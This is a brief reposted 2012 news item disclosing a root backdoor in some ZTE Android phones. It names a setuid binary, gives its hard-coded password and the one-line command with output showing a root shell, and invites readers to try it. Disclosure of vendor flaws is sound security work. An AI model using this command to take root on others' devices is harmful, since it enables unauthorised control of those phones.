中兴(ZTE)手机存在后门，可获得 Root Shell

转自：http://www.landofdroid.com/2012/security-zte-phones-root-backdoor/

It’s appearing that a root backdoor has appeared in ZTE phones, allowing full root to devices. It simply provides a root shell using a hard-coded password. This is serious news for any hackers, as this command can cause major damage to phones.

Here is the information, should you wish to have a go:

The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.

There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.  Just give the magic, hard-coded password to get a root shell:

$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)

Nice backdoor, ZTE.

It is confirmed on these devices:

• ZTE Skate WWE edition
• More as we hear…

If you have tested and got this to work for your devices, tell us in the comments or on any social networks.

We should know more when ZTE makes an announcement as to why this was included.

Source via Justin Case

留言评论（旧系统）：

文章来源于lcx.cc:中兴(ZTE)手机存在后门，可获得 Root Shell